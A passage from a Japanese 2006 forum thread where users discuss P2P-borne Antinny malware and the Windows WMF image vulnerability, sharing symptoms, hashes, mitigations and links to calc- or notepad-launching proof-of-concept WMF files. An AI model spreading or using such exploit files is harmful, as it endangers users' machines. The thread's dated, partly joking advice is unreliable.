に変えられてた

566 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:42:24 ID:Aq2zirwS0
むしろ新年早々クリーンインストールする。(`・ω・´)

567 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:47:09 ID:4/BWiKeJ0
>>535
>フォルダアイコン偽装の exe にひっかかって、ダブルクリックしてしまった。。。

普通引っ掛かるかよwwwww

>予防策として、

その前にすることあんだろwwwww

568 :[名無し]さん(bin+cue).rar:2006/01/01(日) 22:49:34 ID:qc9aZCxw0
>545のファイルで洒落のはブラウザ開いてRootKit落としてsystem32へexeコピーしてレジストリ書き換えて…と。
いろいろやっていたな。

569 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:04:36 ID:CrNAwRML0
regsvr32 -u %windir%\system32\shimgvw.dll
コレやったら、explorerの縮小版表示ができなくなった

570 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:06:19 ID:Mdi0Hgyw0
>>569
それで?

571 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:08:37 ID:CQ7ia0rK0
   █████▓░  ██▓░████▓████████▓░
 ██▓░   ██▓░██▓██▓░       ██▓░
██▓░     ██▓███▓░        ██▓░
██▓░     ██▓██▓░        ██▓░
██▓░     ██▓██▓░       ██▓░
 ██▓░   ██▓░██▓░      ██▓░
   █████▓░  ██▓░     ████████▓░


572 : 【豚】 【573円】 :2006/01/01(日) 23:08:38 ID:+feIYMj30
>>567
その前にやることを教えて。

573 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:11:59 ID:BHOXmXxt0
釣りじゃないならテンプレくらい読みなよ・・・

574 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:13:49 ID:uc6Fh0Wb0
天麩羅読まないヤシと情報小出しにするヤシにろくなヤシはいない

575 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:14:00 ID:QUUNIkcJ0
WIN98のおいらには全く意味の無いウイルスだな(^∪^)

576 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:14:10 ID:YEaw1cYi0
>>572
P2Pと縁を切る

577 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:15:19 ID:zjvwgJQe0
>>575
あるあるwww

578 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:16:42 ID:uc6Fh0Wb0
>>575
ウイスルじゃなくトロイもしくは脆弱性だよ
っていうか藻前さんも関係大ありだ

↓で「釣れた」とか言い出しそうな悪寒

579 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:17:55 ID:GSk97gSI0
藻前とか使うなキモイ

580 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:18:17 ID:aesCD4M40
釣れた釣れたw
馬鹿が一匹つれたwww

581 : 【中吉】 【98円】 :2006/01/01(日) 23:20:08 ID:+feIYMj30
>>576
いや、このさい、コンピュータと縁を切るって方がいいんじゃないか?
というか、人生と縁を切るのが最強だと思うが??


閑話休題
 shimgvw.dll だけど、NTFS の場合、アクセス権で read/write 拒否設定をすると、
一時的なのかどうかわからんが、一応、dll が使われなくなりました。
jpg ファイルを右クリックして windows Pictures and Fax Viewrer を選択すると、
エラーダイアログが出て、「〜shimgvw.dll を読み込み中にエラーが発生しました。」
と出るようになりました。

windows 再起動したけど、アクセス権は戻りませんでした。ファイル保護機能は、
アクセス権までは、見ていないんでしょうかね。

582 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:25:40 ID:qc9aZCxw0
>ファイル保護機能は、アクセス権までは、見ていないんでしょうかね。

そのようで。
この件についてはアンチウイルスに期待するよりも有効かと。

583 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:31:20 ID:Fo20CT6M0
「LHTMP000」っていう実行ファイルをインストールして
「(アニメ) 新世紀エヴァンゲリオン リニューアル版 第07話 「人の造りしもの」(640x480 DivX502DVD).avi」
っていうJPEGイメージを延々と次々と増殖させていくウィルスは何ですか?

584 :[名無し]さん(bin+cue).rar:2006/01/01(日) 23:39:33 ID:+4Lb3p920
>>583
ウイルスです。
対処法はPC買い替え。

585 :[名無し]さん(bin+cue).rar:2006/01/02(月) 00:08:34 ID:uZbjDspJ0
>>565
再起動の前にmofmof.exeを消しておいたら再起動しても変えられなかった。
(\Pornoshop_elomentsは気がつかなかったのでそのまま。)
レジストリの方も掃除しておいたけど。

586 :[名無し]さん(bin+cue).rar:2006/01/02(月) 00:27:43 ID:0BbGuoRa0
フォルダアイコン偽装exeってのは何表示だと見れますか?縮小表示だけですか?
どんな物か一度見ておきたいのでハッシュ下さい

587 :[名無し]さん(bin+cue).rar:2006/01/02(月) 00:28:59 ID:Aiak9xnp0
うん おもしろいな

588 :[名無し]さん(bin+cue).rar:2006/01/02(月) 00:41:43 ID:y+9+orTW0
バスターとavastって実際解るほど検出率違う?

589 :[名無し]さん(bin+cue).rar:2006/01/02(月) 00:43:13 ID:X9yYx9uE0
>>588
そういうことはセキュ板にでも逝って訊いてくれ

590 :[名無し]さん(bin+cue).rar:2006/01/02(月) 01:50:37 ID:JbTBkPq90

http://kjm.kir.jp/pc/img/11350.jpg




591 :[名無し]さん(bin+cue).rar:2006/01/02(月) 01:51:07 ID:9AnbuJLO0
test

592 :[名無し]さん(bin+cue).rar:2006/01/02(月) 02:19:32 ID:1hhaEUrS0
>>95-96

593 :[名無し]さん(bin+cue).rar:2006/01/02(月) 02:39:47 ID:1hhaEUrS0
このスレコワス

594 :[名無し]さん(bin+cue).rar:2006/01/02(月) 02:44:07 ID:zDsyujoZ0
>>537
絶対無いとは言い切れないし
そう言う奴はどこかでヘマをするぞ

595 :[名無し]さん(bin+cue).rar:2006/01/02(月) 03:15:55 ID:Ya289H3t0
>>433
補足
(C69) (同人誌) [レズ萌え!] -Lezmoe Style- TIGER GYM (Fate/hollow atraxia).zip
トリップ・0EeVT5YZUY、ハッシュ・bb5b860123612530ce076338c15fd2ed
001.jpgがWMF脆弱性利用の何か


596 :[名無し]さん(bin+cue).rar:2006/01/02(月) 05:28:46 ID:1A20LaJg0

パッチはまだなのかい?
ゲイツ頼むよ。

597 :[名無し]さん(bin+cue).rar:2006/01/02(月) 06:38:10 ID:2i4C+4LbO
すいませんが教えて下さい。
手違いでインリン様を食らってからWindowsの動作がめちゃ遅くなってしまって困ってます。
初心者の自業自得と思って反省してますが、どう対処すればいいのか分からないのです。
どなたか良きご指導を下さい・・・

パソコン投げ捨てるしかないのかな(´・ω・`)

598 :[名無し]さん(bin+cue).rar:2006/01/02(月) 06:43:12 ID:5gzfUaj60
インリンさまってなんだ?

599 :[名無し]さん(bin+cue).rar:2006/01/02(月) 06:46:33 ID:UbwqThIG0
再インストールこれ最強

600 :[名無し]さん(bin+cue).rar:2006/01/02(月) 07:52:16 ID:OH3VU4nv0
>>597
先生がW32.HLLW.Antinnyで検出すると思ったが
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html

601 :[名無し]さん(bin+cue).rar:2006/01/02(月) 07:55:04 ID:OH3VU4nv0
sage忘れスマソ

602 :[名無し]さん(bin+cue).rar:2006/01/02(月) 08:52:13 ID:jUP4+Ihs0
ttp://grin.flagbind.jp/runcalc.wmf 電卓が起動するだけ
ttp://kikuz0u.x0.com/wmf_exp.wmf メモ帳が起動するだけ


これって電卓が起動、メモ帳が起動したらヤバイの?
それともOKなの?

603 :586:2006/01/02(月) 08:52:16 ID:dwQE4GoZ0
> (C69)(同人誌)[れっさーぱんだ] 狂姦メイドカフェ 〜エスプレッソは愛欲の香り〜.zip KRXfH0AOR9 1,227,650 d9d8d0229ccb308d0ca0ef5f9547f76d

これ落としたら確かにアイコンがフォルダだった(^ー^;

604 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:26:02 ID:kw3jCE4A0
>>602
ノートン先生が反応したからプログラムが起動するとヤバイ

605 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:32:58 ID:jUP4+Ihs0
>>604
電卓もメモ帳も出なかったけど
何か、ブラウザが開きかけてすぐ消えた。一瞬反応した。なんなんだ…



606 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:34:24 ID:lHMNGp580
>>605
その動作ならとりあえずはOK

607 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:41:31 ID:a0glj3w/0
>>602のをjpgとかBMPにリネームして
susieで開いても読み込めないってエラーでるだけで電卓とかメモ帳起動しないから
susieプラグイン使うビューアーで画像みてる分には大丈夫ってことですかね?

608 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:45:17 ID:jUP4+Ihs0
>>604
>>606
THX

609 :[名無し]さん(bin+cue).rar:2006/01/02(月) 09:55:30 ID:lMFfo07m0
AVGがようやく対応されたみたい。
いま更新来たから検証用の電卓実行wmfをScanしてみたらウイルス認定した。
しかし、対応遅かったな。

610 :[名無し]さん(bin+cue).rar:2006/01/02(月) 10:03:21 ID:NeDSF8zq0
>>607
susieは、独自に作られた画像表示dllを呼び出すためだけの
単なる一種のランチャーにすぎない。
要は安全てことだ。


611 :[名無し]さん(bin+cue).rar:2006/01/02(月) 10:21:29 ID:HWbDWJ4E0
avgも対応したっぽいな

612 :[名無し]さん(bin+cue).rar:2006/01/02(月) 10:51:30 ID:mPLx+XHy0
ノートン教授に全てお任せしたらいいんだよ
何も問題はございません

613 :[名無し]さん(bin+cue).rar:2006/01/02(月) 10:53:31 ID:yZXAhhGB0
WindowsMeだと検証ファイル踏んでも何も起こらないな・・・
上のほうで出てた海外の人が作ったパッチも
お前のシステムには使えないって出る。
>>563みたいになったし。


614 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:00:45 ID:R2FyPQd10
当方愛用のAntidoteフリー版の対応はまだかいの?

・・よくよく考えたらMYPCのCPUAthlon64だった。
バックアップとってSP2に移行するのとMSのパッチ待つのどっちにすべきか悩むよ

615 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:12:25 ID:b3GrW1Ds0
>>613
やっぱMeだと何も起こらないようです
プレビューを利用できませんとなる
当方WindowsMe,ノートン先生(一時的に常駐解除して実験),DEP無し

616 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:22:23 ID:jSyKXl3Z0
>>613 >>615
IrfanViewなどで開いて電卓が起動しなければおk



617 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:24:27 ID:BddqoZon0
MSのセキュリティ情報に Win98/98se WinMe は関係ないって書いてあるだろ

618 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:31:54 ID:kw3jCE4A0
http://www.microsoft.com/japan/technet/security/advisory/912840.mspx
関係無いとは読めないけど

619 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:35:13 ID:FAmiLa6C0
>>617
どこに関係ないって書いてあるのか教えてくれませんか?
関連するソフトウェアに列挙されてるように見えますが

620 :[名無し]さん(bin+cue).rar:2006/01/02(月) 11:35:30 ID:BddqoZon0
悪い。こっちと勘違いしてたよ
http://www.microsoft.com/japan/technet/security/bulletin/ms05-053.mspx

621 :[名無し]さん(bin+cue).rar:2006/01/02(月) 12:08:16 ID:Ya289H3t0
>>615
WMF脆弱性について、Windows MEや98、98SEは、ExplorerやIEから
shimgvw.dllを呼びださいないため、ExplorerやIEを使っていての危険性は低い。

ただし、システムにshimgvw.dllは存在してる。IrfanViewなどは直接
shimgvw.dllを呼び出すので、そういったツール経由からだと危ない。
ということで>>616の通り

622 :[名無し]さん(bin+cue).rar:2006/01/02(月) 14:30:12 ID:yZXAhhGB0
>>621
なるほどよく分かった
VIXで実験してみたけど何も起こらなかった。
今のところ俺の環境では危険度低そうだな。


623 :[名無し]さん(bin+cue).rar:2006/01/02(月) 14:44:35 ID:Ya289H3t0
>>622
susie、ViX、MangaMeeya等は、独自dllでshimgvw.dllを利用しないので
XPでもWin2kでも、とりあえずは大丈夫そう

624 :[名無し]さん(bin+cue).rar:2006/01/02(月) 15:05:44 ID:HTNpBzjy0
MEや98、98SEはそれ自体ウイルスみたいなもん

625 :[名無し]さん(bin+cue).rar:2006/01/02(月) 15:36:53 ID:T455rVLE0
AVGも対応したみたいだね

626 :[名無し]さん(bin+cue).rar:2006/01/02(月) 15:39:58 ID:ROXxAN+s0
更新してもavast反応しなくなった・・・

627 :[名無し]さん(bin+cue).rar:2006/01/02(月) 16:06:32 ID:4QqeotaT0
ノートンなのに普通に>>602に反応するんですけど・・・
どうして??

628 :[名無し]さん(bin+cue).rar:2006/01/02(月) 16:12:20 ID:9IkDvD6y0
しかし
>>602のサイトの管理人はとんでもないものをサイトにおいて帰省してるなw
かえったらアクセスがパンクしてびっくりだろう。

http://kikuz0u.x0.com/td/

629 :[名無し]さん(bin+cue).rar:2006/01/02(月) 16:15:22 ID:9IkDvD6y0
今回のウィルスのその他の解説
http://grin.flagbind.jp/

今回のウィルスは猿でも作れるような有名なツールがあるらしい
http://grin.flagbind.jp/archives/2005/01/metasploit_v23.html
http://japan.cnet.com/news/sec/story/0,2000050480,20065381,00.htm

630 :[名無し]さん(bin+cue).rar:2006/01/02(月) 16:38:35 ID:2i4C+4LbO
>600
レスありがとうございます。
ってーことはスキャンかければ駆除されるということですかね?
取り敢えず今はバスターかけてますが
むう・・・遅い・・・

631 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:13:14 ID:QUMNpsrl0
パソコンを投げ捨てろ
You can fly

632 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:18:28 ID:kw3jCE4A0
>>627
アンチウィルス・ソフトが対応しているかどうか確かめるようなものだから反応する

633 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:24:28 ID:/T+Sm4XD0
早くパッチだしてくれないかな

634 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:31:34 ID:LfNbXmW/0
久々にこのスレ来たらあヴぁすとタンがお怒りになってるよ

635 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:42:42 ID:w281BF7U0
すまんが、regsvr32 %windir%\system32\shimgvw.dlで再登録してみようとみたらエラーが出たんだが


636 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:44:12 ID:T455rVLE0
dl

637 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:44:22 ID:w281BF7U0
スマソ解決したわ。最後の一つ欠けてた

638 :[名無し]さん(bin+cue).rar:2006/01/02(月) 17:46:52 ID:8SjCzdrH0
バスターのうpだてキタワ

639 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:09:24 ID:Cy3mMS4/0
Antinny.AHのが隔離できんな…

640 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:09:48 ID:rHOj3ciy0
ニュースにならんね

641 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:12:19 ID:bHZ/yc6d0
【使用OS】 windows95
【WindowsUpdateしてるか】 年に一回
【使用AntiVirusソフト】 キンタマ
【AntiVirusをUpdateしてるか】 毎日してる
【ウイルススキャンの結果】 多すぎてワカンネ
【オンラインスキャンしたなら結果】トレンドマイクロ 多すぎてワカンネ
【Winnyのバージョン】 2.0b7.1
【Winny歴、総DL量】 半年、300GBくらい
【テンプレを読んだか】 読んだ。
【テンプレにある対策を実行したか】 頑張った
【症状、具体的に分かる限りすべて書く】
nyのフォルダにキンタマとかいうのがありました。仁義はないらしいです
【何をしたらそんなことになったのか】毎日エロ本読んでたら
【これまでにとった措置】エロ本控えた


642 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:13:24 ID:ROXxAN+s0
ゲイシのお年玉貰ってからは画像うpろだ見に行ってないよ

643 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:15:41 ID:Xj3ZpCGY0
キンタマデビューおめでとう

644 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:40:11 ID:Hajs+/us0
すいませーん。
WIN98SEなんですけど検証用ファイルをダウンロードして拡張子をJPGに変更して
Explorerで見たりダブルクリックしてもメモ帳が開かないんですけど
ウチの環境では今回の大騒ぎの件は関係ないという事ですか?

645 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:47:11 ID:Aiak9xnp0
さぁ

646 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:48:50 ID:tWdBgD5t0
なんか見慣れないエラーが画面にでたんだけど
関係ありますか?

http://www.interq.or.jp/power/itachi/up2/src/Jfile1984.jpg

647 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:50:47 ID:9IkDvD6y0
>>646
やばいんじゃねこれ

648 :[名無し]さん(bin+cue).rar:2006/01/02(月) 18:52:31 ID:xLozeRjz0
>>640
具体的な被害出ないとニュースにならないんじゃね?

649 :646:2006/01/02(月) 19:02:26 ID:tWdBgD5t0
>>647
エラーメッセをググッてみたら
winampのスクリプトエラーですた

スマソ(;´Д`)

650 :[名無し]さん(bin+cue).rar:2006/01/02(月) 19:03:49 ID:Ya289H3t0
>>644
>>621

>>646
対策済みでなければ、おいそれとjpegのリンクなんか踏めないね
(俺は、一応、検証用については無効化してあるが、それでも踏むのいや)

>>648
危険性についての認知度が低すぎ。とくにマスゴミは…
アメではMSの株価下がりまくりらしいが

651 :[名無し]さん(bin+cue).rar:2006/01/02(月) 20:23:38 ID:uBs/ft0n0
>>639
手動でスキャンすると隔離出来る。
なぜ、その場で隔離出来ないのかわからんが・・・。

652 :[名無し]さん(bin+cue).rar:2006/01/02(月) 21:42:42 ID:qKMEy0Xi0
>>626
このスレのことかな?
自分とこも毎回反応するから標準シールドの追加設定でログディレクトリ無視するように
設定しようかと思ってたんだけど今開いたら反応せず…??

653 :[名無し]さん(bin+cue).rar:2006/01/02(月) 21:59:29 ID:/gYjuzrA0
これをよく読むと、普通にhtmlを踏んでもアウトってことだな コワ!
ttp://www.microsoft.com/japan/technet/security/advisory/912840.mspx

654 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:08:19 ID:5gzfUaj60
なにふんでもアウトにできるし、お、おちたぜーっnyフォルダ確認しただけでアウトにもできる


のか?

655 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:24:15 ID:gMkY70cK0
以外に喰らった話が表で聞かないが
喰らったPCは死んでいるってことかな?

656 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:24:40 ID:Ya289H3t0
>>654
画像ファイル(ほとんどすべての画像系拡張子)を含むHTMLとか、
ny環境ならExplorerで、downフォルダ開いただけでアウト。

先生とかが検出できないブツも流布し始めた。腐れWindowsめ、
Win2kとXPなら、とりあえずは私的パッチ(下記URL検証済)
ttp://handlers.sans.org/tliston/WindowsMetafileFix.html
入れるのが正解。

657 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:25:24 ID:KiCAcgrm0
おれのavastも反応しなくなったよ
avast側が誤動作に対応したってことはないよな?
例の電卓等は普通に反応する

658 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:25:58 ID:DxiWjNs40
仁義とかの流出ものを名前で地引きしてたりすると引っかかるかもしれない。
アンチウイルスに検知されないようにカスタマイズされた画像とexeの組み合わせであぼーん。

659 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:26:04 ID:Ya289H3t0
追記。私的パッチは
wmffix_hexblog13.exeが最新。

660 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:27:55 ID:xENbwHqB0
notepadが起動するだけじゃなくて
メモリのエラーがでてるみたいなんだよなー。
カーネルメモリーデバッガとかがエラーはくし

661 :586:2006/01/02(月) 22:37:37 ID:GJhVOqqt0
例の脆弱性は動画もダメなんじゃないの?
サムネ表示あるんだし

662 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:39:43 ID:xENbwHqB0
>>661
過去ログとか嫁!な

663 :[名無し]さん(bin+cue).rar:2006/01/02(月) 22:43:41 ID:0Hg/khJk0
あれ

664 :[名無し]さん(bin+cue).rar:2006/01/02(月) 23:45:31 ID:l3Uqc9Ze0
Windowsの脆弱性を突く画像ファイルが出現
http://news19.2ch.net/test/read.cgi/news/1136212496/


665 :[名無し]さん(bin+cue).rar:2006/01/02(月) 23:54:40 ID:XuJaPP1Z0
ここの2番目のイメージが怪しいんですが…
http://images.google.com/images?q=%E3%83%A9%E3%82%A6%E3%83%BB%E3%83%AB%E3%83%BB%E3%82%AF%E3%83%AB%E3%83%BC%E3%82%BC&svnum=50&hl=ja&lr=lang_ja&newwindow=1

666 :[名無し]さん(bin+cue).rar:2006/01/03(火) 00:17:09 ID:4aTYNnb30
誰か脆弱性メールきた?

667 :[名無し]さん(bin+cue).rar:2006/01/03(火) 00:21:55 ID:xR2gf0go0
メールは来たことねぇ。明日パッチくるかのう

nyで落とせるお勧め同人誌82
http://tmp5.2ch.net/test/read.cgi/download/1136023365/204
↑ノートン先生反応 Wscript.KakWorm
なんか知らんがいつものペンギンじゃないからちょっと怖いな

668 :[名無し]さん(bin+cue).rar:2006/01/03(火) 00:29:57 ID:pcpOkh950
>>667
ログを怖がる必要がどこにあるよ

669 :[名無し]さん(bin+cue).rar:2006/01/03(火) 00:57:21 ID:PHZNl18E0
脆弱性のメールとか、Webサイトの話はよそで
というか、既にny上にも流れてるけどな。

670 :[名無し]さん(bin+cue).rar.exe:2006/01/03(火) 01:10:00 ID:bOjqSugj0
★流行種その10
【HappyNewYear.jpg】(通称・セキュリティホールあけましておめでとう)
■感染ルート
・Webサイトを見る。
・メールで送られてくる。
・エクスプローラなどでファイルのプレビュ。
■主な症状(感染確認方法)
・Windowsのセキュリティ・ホール(脆弱性)を突く新しいタイプの画像ファイル。
・実体はWMF(Windowsメタファイル)形式。
・拡張子は.bmp、dib、emf、gif、ico、jfif、jpg、jpe、jp2、jpeg、png、tif、tiff、wmfなどの場合があるので注意。
・ファイルはWebサイトに置かれているばかりではなく,メールで送られてくる可能性もある。
・被害は悪質なプログラムの活動に依存。
■主な活動内容
・特定サイトに置かれた悪質なプログラム(バックドア・プログラム)を勝手にダウンロードおよび実行させられる。
■駆除方法
・パソコン抱えて2階の窓から飛び降りろ。
■予防
・MicrosoftWindows使うなかれ。

671 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:15:58 ID:R8WOIfpd0
>■感染ルート
>・Webサイトを見る。
>・メールで送られてくる。

ダウソ関係ない

672 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:19:45 ID:4gm0o0tR0
モノが画像だからねぇ

673 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:26:55 ID:MPwHM01T0
>>670
> ■駆除方法
> ・パソコン抱えて2階の窓から飛び降りろ。
> ■予防
> ・MicrosoftWindows使うなかれ。

warota

674 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:28:12 ID:NiDJKJL/0
MS早く対応してほしいなぁ

こんなにパッチが待ち遠しいのは生まれて初めてだ

675 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:38:38 ID:iX8F/oVw0
>>656
うっほ、楽しそうだな。しかし入っちまった場合は、コマンドで消すかフォルダごとけすしかねーのかな

676 :[名無し]さん(bin+cue).rar:2006/01/03(火) 01:52:26 ID:Mx7qQZvQ0
未だにキンタマの被害に合ってる奴って軽度の池沼だな
フォルダ情報タブのチェックすらしてないとか有り得んわ

677 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:00:05 ID:uYdyBz3S0
必要以上に騒ぎになっている気もするな。
気にしないよりは遙かにましだけどw

678 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:02:58 ID:TNbUJISU0
>>670
数日前(去年の12月後半)に某画像掲示板にあったGIF画像がこれかもしれん。
数名の水着姿の女性が立っていて、背景が透明指定になっていた。
(サムネイルだと真っ黒の画像にしか見えなかった)
記憶が薄れていて正確に記述できないけど、
開いた瞬間(画像を表示した瞬間)、
突然小さなウィンドウが開いてパスワードらしき文字列の記入を要求するんだけど、
OKとかキャンセルのボタンを押すと、どんどんそのウィンドウが増殖していった。
その後、徹底的にマシンを調べてみたけどウィルス感染らしき傾向は無かった。
一応、ブラウザはSleipnir な。セキュリティ的には、IEと大して変わらんが。

679 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:17:52 ID:Rbc+aUsp0
昔懐かしのブラウザクラッシャーと言うものではあるまいか。よくわかんねっけど。

680 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:31:45 ID:kMQpoAV+0
そういえば前から、普通のjpegだけどサムネイルが違うやつあったな。
それもこの脆弱性を使ったものなの?

681 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:34:44 ID:wTLSzZiS0
それはサムネイルの画像を別に持ってるだけじゃないのか

682 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:36:31 ID:kmxEIkfB0
やれやれ。
この、脆弱性が発見されたのがいつだと思ってんだか。
無知以前の問題。

683 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:38:13 ID:TNbUJISU0
>>679
その可能性も否定できないけど、画像単体でそういう悪戯を仕組めるものかどうか微妙なところ。
いや、出来ないこともないだろうけど(画像だけで色々遊べることは周知だし)、
最近のことなので、今が旬のその脆弱性を利用したのかな、と。

684 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:41:31 ID:TNbUJISU0
>>682
結構前に有志の人が「画像だけでもウィルスデキルーヨ」って情報を公開したのは分かってる上での話だけど。
もう少しネタ引っ張った上で盛り下げてくれよ orz

685 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:43:02 ID:faxA8tia0
ネタはネタスレでやってろよ

686 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:44:57 ID:sanVJJ3P0
1,2%くらいネタレスが混じっててもいいじゃないか。

687 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:47:52 ID:tOGTNJY90
c69の地引を続ける関係上から非公式パッチ充てたよ。
今の所は不具合なし。

688 :[名無し]さん(bin+cue).rar:2006/01/03(火) 02:50:34 ID:MPwHM01T0
>>687
ニュー速で、エロゲの fate が動作不良したとの報告があった。night か hollow かしらんが。

689 :[名無し]さん(bin+cue).rar:2006/01/03(火) 04:52:38 ID:PHZNl18E0
>>687
俺もC69関連を地引してるが、今のとこ例の私的パッチの効果はあるよ。
とりあえずは、何も起きない。

>>670
ファイルのプレビューではなくて、フォルダ開いた時点でも発動する
(縮小表示、並べて表示の場合)。そのほかの表示モードでは、ファイル
選択時(マウスカーソルが上に逝っただけでも)に発動。

脆弱性を抱えたままのWindowsでも、DOS窓でのcd/dir/del/ren等のコマンドなら
安全に操作できる。画像系の拡張子はtxtにして無力化してから、バイナリ見て
MagicBytesを確認するという手もある。面倒だが。

>>678
あー、今回の脆弱性を突付く画像ファイルは、画像そのものは表示されない。
それはサイトそのものにスクリプトで仕込んであったのか、あるいは
水着姿のGIFとは別の場所に、WMF(拡張子偽装もの)が仕込んであったかだな。

分かり易い変化を仕込むなんてのは、それほど悪意はないな。何かやるなら
ばれないようにコッソリ仕込むに決まってるだろ。バックグラウンドで
レジストリいじればいいんだし。

690 :[名無し]さん(bin+cue).rar:2006/01/03(火) 04:56:46 ID:PHZNl18E0
>>689
ちょい補足。DOS窓でも、
c:\>hoge.jpg
みたく画像ファイルを直指定すると発動しちゃうよ。


691 :[名無し]さん(bin+cue).rar:2006/01/03(火) 05:58:07 ID:nCNzK5kk0
>>689
言ってることは確かに正しい。逆に安心したわ :D

692 :[名無し]さん(bin+cue).rar:2006/01/03(火) 06:36:49 ID:nFWekXVw0
>>689
ちょっと気になったんだけど
パッチの効果があるってのはウイルス落としても平気だったって事?

693 :[名無し]さん(bin+cue).rar:2006/01/03(火) 06:41:24 ID:Y3ctF3+P0
海外製のパッチ充てると、safenyが使えないんだけど、自分だけ?
xpで、そのまま起動はエラー
safeny抜きで起動は出来る
safeny入りで2000互換モードは起動出来ても通信無し。

694 :[名無し]さん(bin+cue).rar:2006/01/03(火) 06:45:25 ID:Y3ctF3+P0
あぁ自分のiniの勘違いだったすんません。

695 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:03:47 ID:bImlOFIa0
【使用OS】 Xp sp2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】 ウイルスバスター2005
【AntiVirusをUpdateしてるか】 −
【ウイルススキャンの結果】 感染してない
【オンラインスキャンしたなら結果】 感染してない
【Winnyのバージョン】 2.0.0.0
【Winny歴、総DL量】 半年ぐらい、20GB〜30GB
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 一通りやってみた
【症状、具体的に分かる限りすべて書く】 トレンドマイクロの最新ウイルス情報など一部のページにアクセスできない、他にもあるかも
【何をしたらそんなことになったのか】 手動で.zip内のウイルス検索したら、その中にあったファイルを隔離できず感染?
【これまでにとった措置】 テンプレにある対策を一通り


696 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:11:35 ID:bImlOFIa0
修正
【使用OS】 Xp sp2
【WindowsUpdateしてるか】してる
【使用AntiVirusソフト】 ウイルスバスター2005
【AntiVirusをUpdateしてるか】 してる
【ウイルススキャンの結果】 感染してない
【オンラインスキャンしたなら結果】 感染してない
【Winnyのバージョン】 2.0.0.0
【Winny歴、総DL量】 半年ぐらい、20GB〜30GB
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 一通りやってみた
【症状、具体的に分かる限りすべて書く】 トレンドマイクロの最新ウイルス情報など一部のページにアクセスできない、他にもあるかも
【何をしたらそんなことになったのか】 手動で.zip内のウイルス検索したら、その中にあったファイルを隔離できず感染?
【これまでにとった措置】 テンプレにある対策を一通り


697 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:23:56 ID:6Yc7o+ba0
>>696
新作キタ?
もっと詳しく
ハッシュとかどんなものでどんなことをしたとか

698 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:28:50 ID:bImlOFIa0
感染源はほしのあき「Darn-Tarn」内にあるほしのあき    .exeだと思う。
新作ではないと思う。
多分antinny AFとか言うのかな。
対策教えてくれるとうれしいんだが・・・。

699 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:40:42 ID:Y3ctF3+P0
圧縮ファイルのまま検索かけたのなら、もう駆除されてるんじゃないの?
もう一回圧縮ファイルスキャンしてみれば?
